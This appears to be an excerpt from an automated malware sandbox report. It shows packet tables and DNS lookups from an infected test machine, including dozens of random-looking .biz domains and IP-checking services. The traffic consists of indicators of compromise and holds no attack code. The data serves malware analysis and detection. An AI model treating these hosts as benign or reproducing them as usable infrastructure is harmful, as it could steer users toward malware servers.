                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.804809093 CET4921880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.804934978 CET4921880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.810530901 CET804921854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.810575962 CET804921854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:03.064913034 CET8049202199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:03.064984083 CET4920280192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:03.065012932 CET4920280192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:03.070122957 CET8049202199.59.243.228192.168.2.22

                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.339159966 CET5456253192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.345727921 CET53545628.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.584372997 CET5291753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.591567039 CET53529178.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.809870005 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.816653967 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.169909000 CET5789353192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.176743031 CET53578938.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.208528996 CET5482153192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.215403080 CET53548218.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.700023890 CET5471953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.706717968 CET53547198.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.051700115 CET4988153192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.061639071 CET53498818.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.896883965 CET5499853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.904395103 CET53549988.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.878703117 CET5278153192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.885632038 CET53527818.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.607247114 CET6392653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.613821030 CET53639268.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.148497105 CET6551053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.155237913 CET53655108.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.951770067 CET6267253192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.958900928 CET53626728.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.987935066 CET5647553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.996045113 CET53564758.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.793936014 CET4938453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.801728010 CET53493848.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.807354927 CET5484253192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.813716888 CET53548428.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.887154102 CET5810553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.894185066 CET53581058.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:42.575397015 CET6492853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:42.582453012 CET53649288.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.412434101 CET5739053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.419126987 CET53573908.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.944802046 CET5809553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.951411009 CET53580958.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.733863115 CET5426153192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.740870953 CET53542618.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.254509926 CET6050753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.261042118 CET53605078.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.115329027 CET5044653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.121848106 CET53504468.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.246627092 CET5593953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.253349066 CET53559398.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.263942003 CET4960853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.273724079 CET53496088.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.293911934 CET6148653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.301213026 CET53614868.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.104069948 CET6245353192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.110743046 CET53624538.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.144217968 CET5056853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.152160883 CET53505688.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.627363920 CET6146753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.634495974 CET53614678.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.635587931 CET6161853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.642644882 CET53616188.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.645697117 CET5442253192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.652574062 CET53544228.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.741924047 CET5207453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.748874903 CET53520748.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.624852896 CET5033753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.632355928 CET53503378.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.184039116 CET6182653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.190633059 CET53618268.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.741847038 CET5632953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.748874903 CET53563298.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.559298038 CET6346953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.566715956 CET53634698.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.044343948 CET5944753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.050683975 CET53594478.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.815673113 CET5182853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.822382927 CET53518288.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.976964951 CET5340653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.984603882 CET53534068.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.623039961 CET5634553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.629940987 CET53563458.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.645802975 CET5187053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.652829885 CET53518708.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:34.584275007 CET6500953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:34.591279984 CET53650098.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:45.254847050 CET6495653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:45.262031078 CET53649568.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.814760923 CET5452153192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.821993113 CET53545218.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.301343918 CET4975053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.308505058 CET53497508.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.804488897 CET6468753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.810899019 CET53646878.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.227767944 CET6508453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.235430956 CET53650848.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.925652027 CET6337353192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.934954882 CET53633738.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.937546015 CET5620753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.945674896 CET53562078.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.394711971 CET5101453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.401743889 CET53510148.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.569201946 CET4969053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.575774908 CET53496908.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.201472044 CET4994953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.208211899 CET53499498.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.019469976 CET5825753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.026063919 CET53582578.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.524389029 CET5473853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.532082081 CET53547388.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.160516977 CET6159853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.169028997 CET53615988.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.637732983 CET5875453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.831235886 CET53587548.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.583293915 CET4922653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.590039015 CET53492268.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.317264080 CET5469553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.324563026 CET53546958.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.241157055 CET6160153192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.248411894 CET53616018.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.726906061 CET5461553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.734153986 CET53546158.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.761492968 CET5495053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.769293070 CET53549508.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.693620920 CET6421553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.700954914 CET53642158.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.050468922 CET5960453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.057585955 CET53596048.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.790848017 CET4952053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.798438072 CET53495208.8.8.8192.168.2.22

                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.339159966 CET192.168.2.228.8.8.80x25cStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.584372997 CET192.168.2.228.8.8.80xfd20Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.809870005 CET192.168.2.228.8.8.80x4787Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.169909000 CET192.168.2.228.8.8.80xc7f5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.208528996 CET192.168.2.228.8.8.80x19f3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.700023890 CET192.168.2.228.8.8.80x74ffStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.051700115 CET192.168.2.228.8.8.80xf478Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.896883965 CET192.168.2.228.8.8.80x1d8aStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.878703117 CET192.168.2.228.8.8.80x4a3Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.607247114 CET192.168.2.228.8.8.80x3Standard query (0)ww7.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.148497105 CET192.168.2.228.8.8.80x7dc0Standard query (0)ww7.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.951770067 CET192.168.2.228.8.8.80xc0edStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.987935066 CET192.168.2.228.8.8.80x6f9aStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.793936014 CET192.168.2.228.8.8.80x44dbStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.807354927 CET192.168.2.228.8.8.80xbfc3Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.887154102 CET192.168.2.228.8.8.80x5e79Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:42.575397015 CET192.168.2.228.8.8.80x4becStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.412434101 CET192.168.2.228.8.8.80xb548Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.944802046 CET192.168.2.228.8.8.80xde77Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.733863115 CET192.168.2.228.8.8.80x40f7Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.254509926 CET192.168.2.228.8.8.80xeffaStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.115329027 CET192.168.2.228.8.8.80xf9d6Standard query (0)ww7.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.246627092 CET192.168.2.228.8.8.80xd920Standard query (0)ww7.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.263942003 CET192.168.2.228.8.8.80x3efcStandard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.293911934 CET192.168.2.228.8.8.80x3415Standard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.104069948 CET192.168.2.228.8.8.80xabe7Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.144217968 CET192.168.2.228.8.8.80xb991Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.627363920 CET192.168.2.228.8.8.80x6c7eStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.635587931 CET192.168.2.228.8.8.80x22e2Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.645697117 CET192.168.2.228.8.8.80x2629Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.741924047 CET192.168.2.228.8.8.80x5fa2Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.624852896 CET192.168.2.228.8.8.80xf946Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.184039116 CET192.168.2.228.8.8.80xd2f7Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.741847038 CET192.168.2.228.8.8.80x3faeStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.559298038 CET192.168.2.228.8.8.80xc326Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.044343948 CET192.168.2.228.8.8.80xaca3Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.815673113 CET192.168.2.228.8.8.80x6b2eStandard query (0)ww7.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.976964951 CET192.168.2.228.8.8.80x8877Standard query (0)ww7.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.623039961 CET192.168.2.228.8.8.80x77d3Standard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.645802975 CET192.168.2.228.8.8.80x14e3Standard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:34.584275007 CET192.168.2.228.8.8.80x6d77Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:45.254847050 CET192.168.2.228.8.8.80x2034Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.814760923 CET192.168.2.228.8.8.80x7c10Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.301343918 CET192.168.2.228.8.8.80x8260Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.804488897 CET192.168.2.228.8.8.80xc69fStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.227767944 CET192.168.2.228.8.8.80xd687Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.925652027 CET192.168.2.228.8.8.80x2651Standard query (0)ww12.fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.937546015 CET192.168.2.228.8.8.80xb14bStandard query (0)ww12.fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.394711971 CET192.168.2.228.8.8.80x7749Standard query (0)ww7.fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.569201946 CET192.168.2.228.8.8.80x510bStandard query (0)ww7.fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.201472044 CET192.168.2.228.8.8.80xd517Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.019469976 CET192.168.2.228.8.8.80xaf89Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.524389029 CET192.168.2.228.8.8.80x9694Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.160516977 CET192.168.2.228.8.8.80x7c33Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.637732983 CET192.168.2.228.8.8.80x37dStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.583293915 CET192.168.2.228.8.8.80x98ffStandard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.317264080 CET192.168.2.228.8.8.80xff61Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.241157055 CET192.168.2.228.8.8.80x48e4Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.726906061 CET192.168.2.228.8.8.80x9a2fStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.761492968 CET192.168.2.228.8.8.80x39afStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.693620920 CET192.168.2.228.8.8.80xf6d1Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.050468922 CET192.168.2.228.8.8.80x48e4Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.790848017 CET192.168.2.228.8.8.80xd7d8Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.345727921 CET8.8.8.8192.168.2.220x25cNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.591567039 CET8.8.8.8192.168.2.220xfd20No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.816653967 CET8.8.8.8192.168.2.220x4787No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.176743031 CET8.8.8.8192.168.2.220xc7f5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.176743031 CET8.8.8.8192.168.2.220xc7f5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.176743031 CET8.8.8.8192.168.2.220xc7f5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.176743031 CET8.8.8.8192.168.2.220xc7f5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.176743031 CET8.8.8.8192.168.2.220xc7f5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.176743031 CET8.8.8.8192.168.2.220xc7f5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.215403080 CET8.8.8.8192.168.2.220x19f3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.215403080 CET8.8.8.8192.168.2.220x19f3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.215403080 CET8.8.8.8192.168.2.220x19f3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.215403080 CET8.8.8.8192.168.2.220x19f3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.215403080 CET8.8.8.8192.168.2.220x19f3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.215403080 CET8.8.8.8192.168.2.220x19f3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.706717968 CET8.8.8.8192.168.2.220x74ffNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.061639071 CET8.8.8.8192.168.2.220xf478No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
